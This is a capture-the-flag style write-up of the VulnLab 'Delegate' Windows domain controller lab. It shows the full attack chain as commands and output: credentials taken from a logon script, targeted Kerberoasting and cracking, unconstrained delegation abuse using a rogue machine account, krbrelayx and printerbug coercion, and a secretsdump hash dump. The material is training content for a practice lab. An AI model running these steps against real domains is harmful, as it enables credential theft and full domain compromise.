Post

VulnLab Delegate

VulnLab Delegate

VulnLab Delegate

Delegate

Recon

1
2
└─$ rustscan -g -a 10.10.79.151 -r 1-65535
10.10.79.151 -> [53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 10.10.79.151                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 19:24 +05
Nmap scan report for 10.10.79.151
Host is up (0.51s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-24 14:23:13Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2024-12-23T14:19:13
|_Not valid after:  2025-06-24T14:19:13
| rdp-ntlm-info: 
|   Target_Name: DELEGATE
|   NetBIOS_Domain_Name: DELEGATE
|   NetBIOS_Computer_Name: DC1
|   DNS_Domain_Name: delegate.vl
|   DNS_Computer_Name: DC1.delegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-24T14:23:18+00:00
|_ssl-date: 2024-12-24T14:23:58+00:00; -1m19s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-12-24T14:23:19
|_  start_date: N/A
|_clock-skew: mean: -1m19s, deviation: 0s, median: -1m19s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.02 seconds

User

Anonymous authentication on SMB shows nothing interesting. Let’s run spider module

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
└─$ nxc smb 10.10.79.151  -u guest -p '' -M spider_plus
SMB         10.10.79.151    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.79.151    445    DC1              [+] delegate.vl\guest: 
SPIDER_PLUS 10.10.79.151    445    DC1              [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.79.151    445    DC1              [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.79.151    445    DC1              [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.79.151    445    DC1              [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.79.151    445    DC1              [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.79.151    445    DC1              [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.79.151    445    DC1              [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.79.151    445    DC1              [*] Enumerated shares
SMB         10.10.79.151    445    DC1              Share           Permissions     Remark
SMB         10.10.79.151    445    DC1              -----           -----------     ------
SMB         10.10.79.151    445    DC1              ADMIN$                          Remote Admin
SMB         10.10.79.151    445    DC1              C$                              Default share
SMB         10.10.79.151    445    DC1              IPC$            READ            Remote IPC
SMB         10.10.79.151    445    DC1              NETLOGON        READ            Logon server share 
SMB         10.10.79.151    445    DC1              SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.10.79.151    445    DC1              [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.79.151.json".
SPIDER_PLUS 10.10.79.151    445    DC1              [*] SMB Shares:           5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.79.151    445    DC1              [*] SMB Readable Shares:  3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.79.151    445    DC1              [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.79.151    445    DC1              [*] Total folders found:  19
SPIDER_PLUS 10.10.79.151    445    DC1              [*] Total files found:    7
SPIDER_PLUS 10.10.79.151    445    DC1              [*] File size average:    1.15 KB
SPIDER_PLUS 10.10.79.151    445    DC1              [*] File size min:        22 B
SPIDER_PLUS 10.10.79.151    445    DC1              [*] File size max:        3.86 KB

There’s users.bat script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
{
    "NETLOGON": {
        "users.bat": {
            "atime_epoch": "2023-08-26 18:54:29",
            "ctime_epoch": "2023-08-26 18:45:24",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "159 B"
        }
    },
    "SYSVOL": {
        "delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2023-09-09 20:10:32",
            "ctime_epoch": "2023-08-26 15:39:30",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "22 B"
        },
        "delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2023-08-26 17:24:26",
            "ctime_epoch": "2023-08-26 15:39:30",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "1.07 KB"
        },
        "delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2023-08-26 16:01:56",
            "ctime_epoch": "2023-08-26 16:01:56",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "2.73 KB"
        },
        "delegate.vl/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2023-09-09 20:10:32",
            "ctime_epoch": "2023-08-26 15:39:30",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "22 B"
        },
        "delegate.vl/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2023-09-09 17:17:20",
            "ctime_epoch": "2023-08-26 15:39:30",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "3.86 KB"
        },
        "delegate.vl/scripts/users.bat": {
            "atime_epoch": "2023-08-26 18:54:29",
            "ctime_epoch": "2023-08-26 18:45:24",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "159 B"
        }
    }
}

Let’s check content

1
2
3
4
5
└─$ nxc smb 10.10.79.151  -u guest -p '' --share SYSVOL --get-file delegate.vl\\scripts\\users.bat users.bat
SMB         10.10.79.151    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.79.151    445    DC1              [+] delegate.vl\guest: 
SMB         10.10.79.151    445    DC1              [*] Copying "delegate.vl\scripts\users.bat" to "users.bat"
SMB         10.10.79.151    445    DC1              [+] File "delegate.vl\scripts\users.bat" was downloaded to "users.bat"  
1
2
3
4
5
6
└─$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator <REDACTED>

The creds are valid

1
2
3
4
5
6
7
8
9
10
11
└─$ nxc smb 10.10.79.151  -u A.Briggs -p '<REDACTED>' --shares                                      
SMB         10.10.79.151    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.79.151    445    DC1              [+] delegate.vl\A.Briggs:<REDACTED> 
SMB         10.10.79.151    445    DC1              [*] Enumerated shares
SMB         10.10.79.151    445    DC1              Share           Permissions     Remark
SMB         10.10.79.151    445    DC1              -----           -----------     ------
SMB         10.10.79.151    445    DC1              ADMIN$                          Remote Admin
SMB         10.10.79.151    445    DC1              C$                              Default share
SMB         10.10.79.151    445    DC1              IPC$            READ            Remote IPC
SMB         10.10.79.151    445    DC1              NETLOGON        READ            Logon server share 
SMB         10.10.79.151    445    DC1              SYSVOL          READ            Logon server share 

Let’s enumerate domain. We see that A.Briggs has GenericWrite over N.Thompson, who is a mebmer of Remote Management Group

We can perform targeted Kerberoasting using targetedKerberoast.py and crack the hash

1
2
3
4
5
└─$ python3 ~/tools/red-team/targetedKerberoast/targetedKerberoast.py -d 'delegate.vl' -u 'A.Briggs' -p '<REDACTED>' --request-user "N.Thompson" --dc-ip 10.10.79.151
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$664fa24f1ada593976ff6183143991bf$136e3eb290886345007d21b20a1ae115d36a7da19e23c486d617ddd2451363e42549f0acad0fcd98c74cc757ba1cb6901da828c58ee2c2a6cf3d8e638e1becb20b42f7109824e1ef60a976e7d4744d178af69cccbba01863d81fe3e1b3509393df47dd9e824d1956980ad1318308f76921e9f5074741d2f063d98b69beea57ab6d176a9d6004aa48dd95b5fbf13e15638b0803b9c4be9795fc0c5dd110c733bc977f2839ff0df5277e3ccf72b7e20f0de6894c6dfb807df2eb0f98b22b10c7d5edee5db2d7581af160ee865b35b68bc7b1bcbfe75119bd2ac8ac95d2a8aae9254ac384bc9e70a3ceaaa3132b65d32d0be1a4bc8ed47ccbdda136d93ce4f2b0191204751ce2dfd0ac7016ae0e438af116bbe967d19212ecda73d383934c188659f3ceefd4d535376f8d4ca1cc57a767d2f4f527ac3c15b8c771bacae5e78a23de870d55527db334744273912c98d7d064e2ac882cbff318ba99130616691af53d76ff3f05499219a79bb87267b1365a489b5978555f24e7e40b77258fcaa8a509e9d5691714d024203cc3456d8940d0d3a4cf220823e91354f7e4874f8499a3ea1acdd0310f02132b0205c70127e281d3b4238da2916f069b52adf2cb483263f6b3e039f2ca367a5002d1d920a38247a5daae4db14ef2903529ecaf81c93017e76c35b288fdd75678f203d6256d606e226925a6e4c12c79ae86851e73956b373cdec7de9a90cd4d1f1f107de5e4e2b48e264fca7ef0c2652f392b3712efc8518ea979bfb20c3fc4d9e9e8fe2293f57c2d80caae9a63bcb93dc4b142a610859eb4d7b3e3d1fa5dcf383fba023386b539acb346f9247265cdc36975a01b69c14b641dc8cd617b592ae6b2e4efb7fdb2977a14521c0ec6072ca67b5c5f910054f10f798e9a19f07464a6246454eb20b0a1c82ebfcd5c42cd68e9e335f11c2bdd23d5748e32c9113d8203f5e4deeaa973bbc65c7a3b2a8e8b5315d205ff1ab269ad34c26eec691dcfe1989a6e62f28b12ba96ae93a0f8d2ceb9f63d151269ff0017b7553464c749e08729016dd0c1dc68b686117438ac65b203468589e652b17f37fcd67b35e6bdc71f8813cdca7d59c38191f04c263c0550b5a2ceabb453f72beb8c0253b9b2ecd86763ff505ca1bb8c3da5609d843aacc80679d7357961107f0f6136f1c9ec2c994eaf2c488d93a805a8653f2df641acdbda5835b56987516c7f7f01f73b80182a5d93821b70dc7e21638a3f286bb346054e5dc642a99f1ff356b91d860f7bb9b1e8fa7f37c98b29ddf2501384dbacaff12088a6dd8125dda7caee3416d7eac5a267ee765f3074cb87de3cedcb9618e8d3c2baca392b6d2aada436c1a5b6974110ec88f816a779f7c493340d64c4066013478681cd5f74f9b273cd80df8e0d8b235517dd0b16cc802f534e5e1bd6c84159ade0f3b12ca381d080fc12189cac
1
2
3
4
5
└─$ hashcat -m 13100 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$664fa24f1ada593976ff6183143991bf$136e3eb290886345007d21b20a1ae115d36a7da19e23c486d617ddd2451363e42549f0acad0fcd98c74cc757ba1cb6901da828c58ee2c2a6cf3d8e638e1becb20b42f7109824e1ef60a976e7d4744d178af69cccbba01863d81fe3e1b3509393df47dd9e824d1956980ad1318308f76921e9f5074741d2f063d98b69beea57ab6d176a9d6004aa48dd95b5fbf13e15638b0803b9c4be9795fc0c5dd110c733bc977f2839ff0df5277e3ccf72b7e20f0de6894c6dfb807df2eb0f98b22b10c7d5edee5db2d7581af160ee865b35b68bc7b1bcbfe75119bd2ac8ac95d2a8aae9254ac384bc9e70a3ceaaa3132b65d32d0be1a4bc8ed47ccbdda136d93ce4f2b0191204751ce2dfd0ac7016ae0e438af116bbe967d19212ecda73d383934c188659f3ceefd4d535376f8d4ca1cc57a767d2f4f527ac3c15b8c771bacae5e78a23de870d55527db334744273912c98d7d064e2ac882cbff318ba99130616691af53d76ff3f05499219a79bb87267b1365a489b5978555f24e7e40b77258fcaa8a509e9d5691714d024203cc3456d8940d0d3a4cf220823e91354f7e4874f8499a3ea1acdd0310f02132b0205c70127e281d3b4238da2916f069b52adf2cb483263f6b3e039f2ca367a5002d1d920a38247a5daae4db14ef2903529ecaf81c93017e76c35b288fdd75678f203d6256d606e226925a6e4c12c79ae86851e73956b373cdec7de9a90cd4d1f1f107de5e4e2b48e264fca7ef0c2652f392b3712efc8518ea979bfb20c3fc4d9e9e8fe2293f57c2d80caae9a63bcb93dc4b142a610859eb4d7b3e3d1fa5dcf383fba023386b539acb346f9247265cdc36975a01b69c14b641dc8cd617b592ae6b2e4efb7fdb2977a14521c0ec6072ca67b5c5f910054f10f798e9a19f07464a6246454eb20b0a1c82ebfcd5c42cd68e9e335f11c2bdd23d5748e32c9113d8203f5e4deeaa973bbc65c7a3b2a8e8b5315d205ff1ab269ad34c26eec691dcfe1989a6e62f28b12ba96ae93a0f8d2ceb9f63d151269ff0017b7553464c749e08729016dd0c1dc68b686117438ac65b203468589e652b17f37fcd67b35e6bdc71f8813cdca7d59c38191f04c263c0550b5a2ceabb453f72beb8c0253b9b2ecd86763ff505ca1bb8c3da5609d843aacc80679d7357961107f0f6136f1c9ec2c994eaf2c488d93a805a8653f2df641acdbda5835b56987516c7f7f01f73b80182a5d93821b70dc7e21638a3f286bb346054e5dc642a99f1ff356b91d860f7bb9b1e8fa7f37c98b29ddf2501384dbacaff12088a6dd8125dda7caee3416d7eac5a267ee765f3074cb87de3cedcb9618e8d3c2baca392b6d2aada436c1a5b6974110ec88f816a779f7c493340d64c4066013478681cd5f74f9b273cd80df8e0d8b235517dd0b16cc802f534e5e1bd6c84159ade0f3b12ca381d080fc12189cac:<REDACTED>
<SNIP>

Now we can connect via winrm

1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -u 'N.Thompson' -p '<REDACTED>' -i 10.10.79.151                     
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>

Root

We can see that N.Thompson is a member of Delegation Admins

The privileges also show that

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                                       Enabled
SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                                 Enabled

It means that we can enable Unconstrained delegations or Constrained delegations on a computer. To abuse this privilege, we need to create a computer and we can do that due to Machine Account Quota

1
2
3
4
5
└─$ nxc ldap 10.10.79.151 -u 'N.Thompson' -p '<REDACTED>' -M maq
LDAP        10.10.79.151    389    DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl)
LDAP        10.10.79.151    389    DC1              [+] delegate.vl\N.Thompson:<REDACTED> 
MAQ         10.10.79.151    389    DC1              [*] Getting the MachineAccountQuota
MAQ         10.10.79.151    389    DC1              MachineAccountQuota: 10

Let’s create computer first

1
2
3
4
5
└─$ addcomputer.py -computer-name 'PWN' -computer-pass 'ComputerPass123' -dc-ip 10.10.79.151 'delegate.vl/N.Thompson':'<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account PWN$ with password ComputerPass123.

Now, we add DNS record for the machine we created using krbrelayx toolkit

1
2
3
4
5
6
└─$ python3 ~/tools/red-team/krbrelayx/dnstool.py -u 'delegate.vl\PWN$' -p 'ComputerPass123' -r 'PWN.delegate.vl' -d 10.8.4.147 --action add 10.10.79.151
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
1
2
3
4
5
6
└─$ nslookup PWN.delegate.vl dc1.delegate.vl
Server:         dc1.delegate.vl
Address:        10.10.79.151#53

Name:   PWN.delegate.vl
Address: 10.8.4.147

Then we assign TRUSTED_FOR_DELEGATION to created machine, which can be done using bloodyAD or Powerview (Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384)

1
2
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p '<REDACTED>' --host 'DC1.delegate.vl' add uac 'PWN$' -f TRUSTED_FOR_DELEGATION 
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to PWN$'s userAccountControl
1
2
3
4
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p '<REDACTED>' --host 'DC1.delegate.vl' get object 'PWN$' --attr userAccountControl

distinguishedName: CN=PWN,CN=Computers,DC=delegate,DC=vl
userAccountControl: WORKSTATION_TRUST_ACCOUNT; TRUSTED_FOR_DELEGATION

Then we add SPN. If encounter the following error: To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute, run firstly with --additional flag, then run again without it (Usually happens when adding using another user)

1
2
3
4
5
6
└─$ python3 ~/tools/red-team/krbrelayx/addspn.py  -u 'delegate.vl\PWN$' -p 'ComputerPass123' -s 'CIFS/PWN.delegate.vl' dc1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
1
2
3
4
5
6
7
8
9
└─$ python3 ~/tools/red-team/krbrelayx/addspn.py  -u 'delegate.vl\PWN$' -p 'ComputerPass123' -s 'HOST/PWN.delegate.vl' dc1.delegate.vl -q
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=PWN,CN=Computers,DC=delegate,DC=vl - STATUS: Read - READ TIME: 2024-12-24T21:40:21.224333
    msDS-AdditionalDnsHostName: PWN.delegate.vl
    sAMAccountName: PWN$
    servicePrincipalName: CIFS/PWN.delegate.vl

After finishing preparation, we can start the attack. Convert machine’s password to NTLM hash

1
2
3
└─$ pypykatz crypto nt 'ComputerPass123'                           
fa0c39088858443e31cf449a9da745ba

Or

1
2
3
└─$ iconv -f ASCII -t UTF-16LE <(printf "ComputerPass123") | openssl dgst -md4
MD4(stdin)= fa0c39088858443e31cf449a9da745ba

Start krbrelayx.py (Had to specify target or it didn’t work)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ sudo python3 krbrelayx.py -hashes :fa0c39088858443e31cf449a9da745ba --target dc1.delegate.vl
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in attack mode to single host
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections

And use printerbug to coerce

1
2
3
4
5
6
7
8
└─$ python3 printerbug.py delegate.vl/'PWN$':'ComputerPass123'@dc1.delegate.vl PWN.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

We see the connection and ticket is saved

Now we can dump the hashes

1
2
3
4
5
6
7
8
└─$ KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache secretsdump.py -k -no-pass dc1.delegate.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

https://api.vulnlab.com/api/v1/share?id=5727db2c-27ce-40a1-9fa1-abd3445f89de

This post is licensed under CC BY 4.0 by the author.